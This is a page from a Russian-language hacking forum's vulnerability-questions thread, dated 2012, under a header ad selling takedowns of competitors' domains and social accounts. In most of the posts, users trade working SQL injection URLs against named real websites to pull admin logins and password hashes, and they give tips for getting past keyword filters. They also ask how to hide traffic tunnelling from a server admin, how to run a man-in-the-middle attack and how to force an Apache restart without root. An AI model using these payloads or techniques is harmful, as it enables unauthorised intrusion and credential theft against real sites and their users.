УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2090 из 2438

2090

Опции темы

Поиск в этой теме

Опции просмотра

#20891

23.06.2012, 18:44

RazyKK

Познающий

Регистрация: 09.02.2009

Сообщений: 70

Провел на форуме:
393885

Репутация: 34

cat1vo угловые скобки то выр6жутся

#20892

23.06.2012, 18:49

mironich

Guest

Сообщений: n/a

Провел на форуме:
142623

Репутация: 19

Цитата:

Сообщение от None

$interzis = array(";", '"', "", "=", "'", "script", "?php", "%>", "INSERT", "UPDATE", "DROP");

Если ты ее используешь, сожги код и перепиши с использованием htmltospecialchars

#20893

23.06.2012, 18:54

RazyKK

Познающий

Регистрация: 09.02.2009

Сообщений: 70

Провел на форуме:
393885

Репутация: 34

нет не мой, просто знаю код фильтра на сайте, над xss

#20894

24.06.2012, 06:10

A_n_d_r_e_i

Участник форума

Регистрация: 02.09.2009

Сообщений: 286

Провел на форуме:
3426765

Репутация: 257

Отправить сообщение для A_n_d_r_e_i с помощью ICQ

http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+1=1+or der+by+1--+

в общем дальше я ниxуя не понимаю, помогите с этим, где я допустил ошибку и как вытащить логин и хеш админа

#20895

24.06.2012, 07:59

lucky_dom

Guest

Сообщений: n/a

Провел на форуме:
1296

Репутация: 0

как незаметно для админа сервера тунелировать весь траф. Через прокси или тому подобное.

1.задача проведения атаки человек посередине.

2.как узнать пароль от веб сервера (apach виндовый) локально.

#20896

24.06.2012, 13:16

A_n_d_r_e_i

Участник форума

Регистрация: 02.09.2009

Сообщений: 286

Провел на форуме:
3426765

Репутация: 257

Цитата:

Сообщение от Nightmarе

Nightmarе said:
Если order+by не прокатывает, то скорее всего прокатит group+by, что в данном случае и произошло, столбцов 12 штук, однако:
http://super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+union+sele ct+1,2,3,4,5,6,7,8,9,10,11,12+--+1
Данный URL лично у меня не грузится.

Да, у меня тоже( С помощью хавиж достал, но только логины

А тут как:

http://www.incornea.com.co/index.php?option=com_wrapper&view=wrapper&Itemid=3

http://loteriadebogota.com/html/index.php?option=com_wrapper&view=wrapper&Itemid=1 5

А по поводу http://super.com.co, попробуйте, может у кого откроется, нужны хеши

#20897

25.06.2012, 08:00

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

Цитата:

Сообщение от RazyKK

RazyKK said:
можно ли обойти такую xss фильтрацию?
$interzis = array(";", '"', "", "=", "'", "script", "?php", "%>",
"INSERT", "UPDATE", "DROP"
);
$replace = array("");

Прикольно =)

Цитата:

Сообщение от A_n_d_r_e_i

A_n_d_r_e_i said:
http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+1=1+or der+by+1--+
в общем дальше я ниxуя не понимаю, помогите с этим, где я допустил ошибку и как вытащить логин и хеш админа

Код:

Code:
http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+group+by+11#

При union+select сайт зависает. А при union(select(1),2,3,4,5,6,7,8,9,10,11) не зависает, но false. При uniunionon, selselectect так же false. Поэтому:

Код:

Code:
http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+substring((select+version()),1,1)=5+and+'1'='1

Цитата:

Сообщение от A_n_d_r_e_i

A_n_d_r_e_i said:
Да, у меня тоже( С помощью хавиж достал, но только логины

А что помешало достать пароли?

Цитата:

Сообщение от A_n_d_r_e_i

A_n_d_r_e_i said:
http://www.incornea.com.co/index.php?option=com_wrapper&view=wrapper&Itemid=3
http://loteriadebogota.com/html/index.php?option=com_wrapper&view=wrapper&Itemid=1 5

Com_wrapper, даже смотреть не буду

#20898

25.06.2012, 10:00

Sidarovich1975

Новичок

Регистрация: 04.10.2009

Сообщений: 10

Провел на форуме:
58602

Репутация: 1

Возникла следующая ситуация:

Есть не рут доступ, но httpd.conf доступен на запись.

Как принудительно ребутнуть апач (или перепрочитать конфиги) , если на "service httpd graceful" не хватает прав? может кто сталкивался... грубо говоря нужно заставить его самого перезагрузиться из вне.

#20899

26.06.2012, 00:36

pirat0

Guest

Сообщений: n/a

Провел на форуме:
23576

Репутация: -1

Код:

Code:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /var/www/xxx.ru/www/lib/core.php on line 18

а возможно как то раскрутить или это просто вывод инфы?

#20900

26.06.2012, 00:50

pirat0

Guest

Сообщений: n/a

Провел на форуме:
23576

Репутация: -1

ну вот допустим http://www.justsims2.ru/

PHPSESSID доставляю ^ и вывод ошибки

Страница 2090 из 2438

2090

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход